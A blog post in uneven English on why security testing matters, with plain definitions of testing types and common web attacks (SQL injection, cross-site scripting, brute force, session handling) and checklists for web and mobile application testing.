Importance Of Security Testing

 

Importance of Security Testing

Now a days, all of our data is on the cloud .All our sensitive data, personal information’s such as bank details, emails, password, credit card number etc...  Are stored in some server and managed by in particular database. But hackers regular show how vulnerable most of your online data is. Data leaks happen every day, across the world.

But the leakage of data is not good to organization and for their clients. So there are trying to give their best security in their applications and website. Major companies like Google and Apple are also offering big cash rewards to who can identify security vulnerabilities in their websites and software products.

 

The primary ideal of security testing is to identify and assess how vulnerable a system may be and to determine if the data and resources are defended from implicit hackers.

 

Now days world security testing has been extended a lot in different ways like:

 

►Vulnerability Scanning

►Security Scanning

►Penetration testing

►Risk Assessment

►Security Auditing

►Posture Assessment

►Ethical hacking



Software security testing is vital in its own way and many organizations who serve these services includes this testing as well. Details are



 

Vulnerability Scanning: is a type of computer program designed to access computers software to identify security and flaw weakness in system.

 

Security Scanning: This type of surveying help to identify network and system weaknesses, and later predicts solutions for reducing these risks. Both Manual and Automation tools are used in this test type.

 

Penetration testing: This testing identifies an attack from a vicious hacker. This testing involves analysis of a particular system for checking implicit vulnerabilities to an outworld hacking attempt.

 

Risk Assessment: This testing is being used for analysis of security risks noticed in the organization. It recommends controls and measures to reduce the hazard, risks are classified as Low, Medium and High.

 

Security Auditing: This testing involves inner overview of Applications and Operating systems for security flaws.

 

Ethical hacking: It’s playing an Organization Software systems. Unlike vicious hackers, who steal for their own earnings, the intent is to expose security excrescencies in the system.

 

Posture Assessment: It is a compound of Ethical Hacking, Security scanning and hazard Assessments to show an overall security posture of an organization.


Some key terms used in security testing.


 

♦Vulnerability: this is a weakness in the web application.

♦URL Manipulation: it is easy to edit URL in browser. Lack of security can cause the consumers to be delivered and confidential data being leaked. Thus, it’s much important to the tester to check if the app becomes judge data through its URL string.                      

Testers check whether or not the application allows sensitive data in the query string. These types of attacks be when the application uses the HTTP GET method to exchange information between the server and the client.

♦SQL Injection: SQL Injection is a very critical vulnerability. It is one of the most popular, dangerous, frequent vulnerability technique. It give access your database to hacker.  Inserting SQL statement through the web application user interface into some query that is then executed by server

Testers check the SQL injection access points to recognize if it can be exploited by a SQL injection attack. They identify and test the database code in which direct MySQL queries are performed on the database by concede exact user inputs.

♦cross site scripting: It is a client-side injection attack where the attacker target to execute malicious scripts in the victim’s browser.                                                                                                                   These malicious scripts can perform a type of functions such as send the victim’s login credentials or session token to the attacker, log their keystrokes, or perform arbitrary actions on behalf of the victim.

Testers must ascertain that the input fields do not trust invalidated user input, and must properly encode the output of these fields if they are included in a server response.

♦Brut-force Attack: Brute-force attacks depend on guessing separate combinations of a targeted password till the true password is funded. Attackers use brute-force attacks to gain entry to sensitive details such as personal identification numbers, passphrases, passwords, or usernames to lift out identity theft, move domains to sites with malicious content, or other malicious activities.

♦Monitor access control management: a web application or a computer, access control is a complicated aspect that helps save your application safety or system from being exploited by attackers or insider threats.

There is two parts.        

•Authentication – who are you? (Verify user’s identification)

•Authorization – what are allowed to do (decide user’s permissions)

 

♦Check server access control: Web applications have multiple user’s entry points that provide sufficient access to complete users’ requests, but they must maintain security to avert data breaches or attacks.

Testers should ensure that all internal-network entry points to the application are by expected machines (IPs), applications, and users and that all access is strictly controlled.                                    to check if an open entry point is enough restricted, the QA should try to access these points from various machines having both untrusted and trusted IP addresses. 

Moreover, a variety of realtime transactions should be performed in bulk to check the application’s performance under load.                                                                                    

doing security testing, the tester should also check if the open entry points in the application approve specific actions by the users in a secure way.

♦session management: To ensure that your application has appropriate session management, check the session expiry after a particular idle time, session termination after login and log out, session termination after maximum lifetime, check for session time gap and session cookie scope, etc.


Checklist to consider when performing web application

1. Asset discovery

2. Check for outdated versions

3. Check permissions

4. Check Security protocols

5. Analyze code rigidity with penetration test

6. Test database security

7. Check network assets

8. Run configuration tools

9. Client side logic

10. Business logic

11. Input validation

12. Authentication and session management

13. Configuration

14. Check authorization

15. Test error handling


Checklist to consider when performing Mobile application security testing.


1. Nature of the app

2. Check application code is Hack proof code  

3. Avoid unnecessary user permission,

4. Check the background data usage while running app

5. Check battery usage while application on running, also check that application is running at that time battery is not overheating.

6. Check data transaction protection  

7. Check hidden activity that ensure the application don’t use user’s private files

8. Check application don’t use any third party payment gateway

9. Check hidden loophole in app


Benefit of security testing


•Get higher return
•Secure third party API & services
•Eliminate the impact of Trojan apps
•Prevent data leaks
•Implement corporate policy
•Secure the application code
•Eliminate common security vulnerability
•Prevent real time security attacks








Comments

Post a Comment

Popular posts from this blog

Test cases for Dashboard

Image
  Test Cases for Dashboard Testing In the dashboard testing, you need to fully concentrate and also be aware of the product flow. Now a day’s many types of dashboards are available which are used as per requirement. Some test cases which are helpful to you for the dashboard testing. ->Some common test cases (1)     Ensure that all the widgets are appearing in dashboard (2)     Ensure that widgets count are showing properly (3)     Ensure that widgets color is proper  (4)     Verify that widgets has proper title  (5)     Verify that User details are appear proper in upper right corner  (6)     Verify that all the images are showing in the proper size or proper align (7)     Verify that all available export functionality should work expected (8)     Verify that left menu and Dashboard data should not overlap (9)     Verify that the alert is displayed properly (10) Verify that the Dashboard search functionality should work as expected (11) Verify that all the icon
Read more

Test case for OTP Verification.

Image
Test cases for "OTP" Verification page.  How to test OTP verification functionality. i wrote some scenarios. hope its help-full. 1. Verify that one time password generate within a time duration or not. 2. Check the generated OTP is valid from one time or not 3. Verify that how many time user can enter invalid. 4. To check that it received only registered email/mobile number. 5. Verify that OTP is case-sensitive or not. 6. Verify that if once used then not allowed to use again. 7. Verify that OTP received with set of count or not. (like 6 digit OTP) 8. Verify that it allow to use after timeout? 9. Verified that Resend OTP button is working or not. 10. Verify that “Submit” button functionality is working or not. 11. Verify that text box is allowed to enter large input rather than OTP size. 12. To check that it display any validation message when clicking on submit button without entering OTP. 13. Check for types of characters are support. Like only digits, only alph
Read more

Test Cases for Payment Gateway.

Image
  The purpose of payment gateway testing is to insure the security, trust ability and performance of a payment gateway by cracking and securing the payment details between stoner and trafficker while furnishing a smooth payment experience. Check List: How to Test Payment Gateway. 1. Arrange proper test data for the dummy credit card number for the maestro, visa, master, etc. 2. Collect payment gateway information like Google Pay, Google Wallet, PayPal, Paytm, or else 3. Collect payment gateway documents with error codes 4. Check for the application response after the transaction. 5. Check for the message that is displayed after a successful transaction. 6. Check for the message that is displayed after an unsuccessful transaction. 7. Check for the language and currency that is relevant to the location. 8. Check the error message if a payment fails. 9. Check redirection after successful payment 10. Check all payment options are working properly. 11. Check for the message th
Read more